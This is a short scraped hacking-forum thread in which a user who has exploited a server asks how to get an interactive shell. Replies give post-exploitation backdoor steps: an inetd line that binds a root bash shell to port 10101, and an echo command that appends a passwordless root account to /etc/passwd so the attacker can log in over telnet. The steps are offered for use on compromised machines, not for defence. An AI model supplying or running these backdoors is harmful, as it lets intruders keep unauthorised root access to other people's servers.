hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Shadowslave
hello,

i have a little problem. when im on a server and want to type "dir" it says only "command completed successfully".... just that nothing more.... and thats quite sucks wink.gif how can i get a "real shell" ? any ideas ?
would be great if any1 has some solutions for that
violator
A successfull exploitation looks like this (this is from my own box):
user posted image

Just redirect the output for commands. If you want a real shell, create an inetd like file, with a line like "10101 stream tcp nowait root bin/bash bash -i", and execute it as a new inetd proccess.. Use your imagination. smile.gif There are many ways to do that.
PS: I hope this post is not against the forum's policy, if it is, sorry adms.
Shadowslave
thx violator i will give it a try smile.gif
teest
this exploit make all of your command just on machine which you wrote ip, it is really easy to use it.
try that:
echo 'root::0:0::/:/bin/bash' >> /etc/passwd
and just telnet smile.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.